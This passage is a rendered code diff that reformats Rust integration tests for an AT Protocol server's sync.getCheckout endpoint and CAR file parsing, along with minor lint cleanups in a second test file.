123 + .send() 124 + .await 125 + .expect("Failed to send request"); 75 126 assert_eq!(res.status(), StatusCode::OK); 76 - assert_eq!(res.headers().get("content-type").and_then(|h| h.to_str().ok()), Some("application/vnd.ipld.car")); 127 + assert_eq!( 128 + res.headers() 129 + .get("content-type") 130 + .and_then(|h| h.to_str().ok()), 131 + Some("application/vnd.ipld.car") 132 + ); 77 133 let body = res.bytes().await.expect("Failed to get body"); 78 134 assert!(!body.is_empty(), "CAR file should not be empty"); 79 135 assert!(body.len() > 50, "CAR file should contain actual data"); 80 - assert!(body.len() >= 2, "CAR file should have at least header length"); 136 + assert!( 137 + body.len() >= 2, 138 + "CAR file should have at least header length" 139 + ); 81 140 for i in 0..4 { 82 141 tokio::time::sleep(std::time::Duration::from_millis(50)).await; 83 142 create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await; 84 143 } 85 144 let multi_res = client 86 - .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 145 + .get(format!( 146 + "{}/xrpc/com.atproto.sync.getCheckout", 147 + base_url().await 148 + )) 87 149 .query(&[("did", did.as_str())]) 88 - .send().await.expect("Failed to send request"); 150 + .send() 151 + .await 152 + .expect("Failed to send request"); 89 153 assert_eq!(multi_res.status(), StatusCode::OK); 90 154 let multi_body = multi_res.bytes().await.expect("Failed to get body"); 91 - assert!(multi_body.len() > 500, "CAR file with 5 records should be larger"); 155 + assert!( 156 + multi_body.len() > 500, 157 + "CAR file with 5 records should be larger" 158 + ); 92 159 let not_found_res = client 93 - .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 160 + .get(format!( 161 + "{}/xrpc/com.atproto.sync.getCheckout", 162 + base_url().await 163 + )) 94 164 .query(&[("did", "did:plc:nonexistent12345")]) 95 - .send().await.expect("Failed to send request"); 165 + .send() 166 + .await 167 + .expect("Failed to send request"); 96 168 assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND); 97 169 let error_body: Value = not_found_res.json().await.unwrap(); 98 170 assert_eq!(error_body["error"], "RepoNotFound"); 99 171 let missing_res = client 100 - .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 101 - .send().await.expect("Failed to send request"); 172 + .get(format!( 173 + "{}/xrpc/com.atproto.sync.getCheckout", 174 + base_url().await 175 + )) 176 + .send() 177 + .await 178 + .expect("Failed to send request"); 102 179 assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST); 103 180 let empty_did_res = client 104 - .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 181 + .get(format!( 182 + "{}/xrpc/com.atproto.sync.getCheckout", 183 + base_url().await 184 + )) 105 185 .query(&[("did", "")]) 106 - .send().await.expect("Failed to send request"); 186 + .send() 187 + .await 188 + .expect("Failed to send request"); 107 189 assert_eq!(empty_did_res.status(), StatusCode::BAD_REQUEST); 108 190 }
+2 -2
tests/verify_live_commit.rs
··· 1 1 use bytes::Bytes; 2 2 use cid::Cid; 3 3 use std::collections::HashMap; 4 - use std::str::FromStr; 5 4 mod common; 6 5 7 6 #[tokio::test] ··· 108 107 cursor.read_exact(&mut header_bytes)?; 109 108 #[derive(serde::Deserialize)] 110 109 struct CarHeader { 110 + #[allow(dead_code)] 111 111 version: u64, 112 112 roots: Vec<cid::Cid>, 113 113 } ··· 135 135 fn parse_cid(bytes: &[u8]) -> Result<(Cid, usize), Box<dyn std::error::Error>> { 136 136 if bytes[0] == 0x01 { 137 137 let codec = bytes[1]; 138 - let hash_type = bytes[2]; 138 + let _hash_type = bytes[2]; 139 139 let hash_len = bytes[3] as usize; 140 140 let cid_len = 4 + hash_len; 141 141 let cid = Cid::new_v1(